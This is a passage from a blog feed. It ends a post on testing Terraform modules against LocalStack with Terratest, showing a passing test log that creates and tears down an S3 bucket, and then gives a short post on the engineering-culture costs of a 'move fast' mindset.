<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ go test -v ./...
=== RUN   TestS3BucketWithLocalStack
{"status":"Pulling from localstack/localstack","id":"latest"}
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 retry.go:91: terraform [init -upgrade=true]
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 logger.go:67: Running command terraform with args [init -upgrade=true]
TestS3BucketWithLocalStack 2025-08-15T12:19:29-04:00 logger.go:67: Initializing the backend...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: Initializing provider plugins...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: - Finding latest version of hashicorp/aws...
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67: - Using previously-installed hashicorp/aws v6.9.0
TestS3BucketWithLocalStack 2025-08-15T12:19:30-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67: Terraform will perform the following actions:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
</span><span class="gp">TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:   #</span><span class="w"> </span>aws_s3_bucket.example will be created
<span class="go">TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:   + resource "aws_s3_bucket" "example" {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + acceleration_status         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + acl                         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + arn                         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket                      = "my-tf-test-bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_domain_name          = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_prefix               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_region               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + bucket_regional_domain_name = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + force_destroy               = false
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + hosted_zone_id              = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + id                          = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + object_lock_enabled         = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + policy                      = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + region                      = "us-east-1"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + request_payer               = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + tags                        = {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Environment" = "Dev"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Name"        = "My bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:         }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + tags_all                    = {
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Environment" = "Dev"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Name"        = "My bucket"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:           + "Service"     = "LocalStack"
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:         }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website_domain              = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website_endpoint            = (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + cors_rule (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + grant (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + lifecycle_rule (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + logging (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + object_lock_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + replication_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + server_side_encryption_configuration (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + versioning (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:       + website (known after apply)
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:     }
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:33-04:00 logger.go:67: Plan: 1 to add, 0 to change, 0 to destroy.
TestS3BucketWithLocalStack 2025-08-15T12:19:34-04:00 logger.go:67: aws_s3_bucket.example: Creating...
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: aws_s3_bucket.example: Creation complete after 0s [id=my-tf-test-bucket]
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67:
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 retry.go:91: terraform [destroy -auto-approve -input=false -lock=false]
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: Running command terraform with args [destroy -auto-approve -input=false -lock=false]
TestS3BucketWithLocalStack 2025-08-15T12:19:38-04:00 logger.go:67: Plan: 0 to add, 0 to change, 1 to destroy.
TestS3BucketWithLocalStack 2025-08-15T12:19:39-04:00 logger.go:67: aws_s3_bucket.example: Destroying... [id=my-tf-test-bucket]
TestS3BucketWithLocalStack 2025-08-15T12:19:39-04:00 logger.go:67: aws_s3_bucket.example: Destruction complete after 0s

--- PASS: TestS3BucketWithLocalStack (10.83s)
</span></code></pre></div></div>

<p>I hope this gives you a solid foundation for testing your Terraform modules with the TerraStack. By leveraging LocalStack and Terratest, you can create fast, reliable tests that run locally or in CI/CD pipelines without the overhead of managing real AWS resources. This approach not only speeds up your development cycle but also gives you confidence that your IaC works as intended before it hits production. Happy testing! If you’re interested in more of my work, check out my <a href="https://github.com/R0seSecurity">GitHub</a>.</p>]]></content><author><name></name></author><category term="terraform" /><category term="quality" /><category term="testing" /><category term="iac" /><summary type="html"><![CDATA[Context]]></summary></entry><entry><title type="html">Rushing Toward Rewrite</title><link href="https://rosesecurity.cloud/2025/03/26/rushing-toward-rewrite.html" rel="alternate" type="text/html" title="Rushing Toward Rewrite" /><published>2025-03-26T00:00:00+00:00</published><updated>2025-03-26T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/03/26/rushing-toward-rewrite</id><content type="html" xml:base="https://rosesecurity.cloud/2025/03/26/rushing-toward-rewrite.html"><![CDATA[<p>This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.</p>

<h2 id="move-fast-and-dont-break-everything">Move Fast and Don’t Break Everything</h2>

<p>A former CEO of mine used to say: <em>“Be fast or be perfect. And since no one’s perfect, you better be fast.”</em> Sounds cool until that motto becomes a shield to skip due diligence, code reviews, and even basic security hygiene. Speed wasn’t a value—it was an excuse. PRs rushed. On-call flaring. Postmortems piling. And still, engineers asking for admin access “to move fast.”</p>

<p>Spoiler: they didn’t need it.</p>

<p>The deeper problem? We weren’t a scrappy startup anymore—we were operating at enterprise scale with a startup mindset. The cost of speed was technical debt, fragility, and a long tail of rework. When I transitioned to a new role (back in startup mode) I heard the same “move fast” mantra. But this time, it hit differently. Because here’s the truth: <em>moving fast is possible without setting your future self on fire</em>.</p>

<p>Here’s what I’ve learned:</p>

<p><strong>1. Fail fast—but fail forward.</strong> Don’t just throw things at prod and hope they stick. Structure your failures. If a solution’s not viable, surface that early with data and a path forward. Good failure leaves breadcrumbs for the next iteration.</p>

<p><strong>2. Build for iteration.</strong> Forget perfect. Aim for clear next steps. Your <code class="language-plaintext highlighter-rouge">v1</code> should be designed with a roadmap in mind. Where will this evolve? What trade-offs are you making? Ship it—but know how you’ll ship it <em>better</em>.</p>

<p><strong>3. Stay modular.</strong> Design with exits. If your observability pipeline starts with a pricey SaaS, fine. But make it swappable. Keep your vendor coupling thin so you can self-host later without a complete rewrite.</p>

<p><strong>4. Be honest about scale.</strong> What worked for a team of 10 won’t work at 100. “Move fast” looks different when customers depend on your uptime. Match your velocity with the blast radius of your decisions.</p>

<p>We glamorize speed, but the smartest teams know when to slow down, breathe, and make thoughtful decisions that stand the test of time. Move fast—but don’t break the foundation.</p>]]></content><author><name></name></author><category term="terraform" /><category term="culture" /><category term="technicaldebt" /><category term="quality" /><category term="code" /><summary type="html"><![CDATA[This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.]]></summary></entry></feed>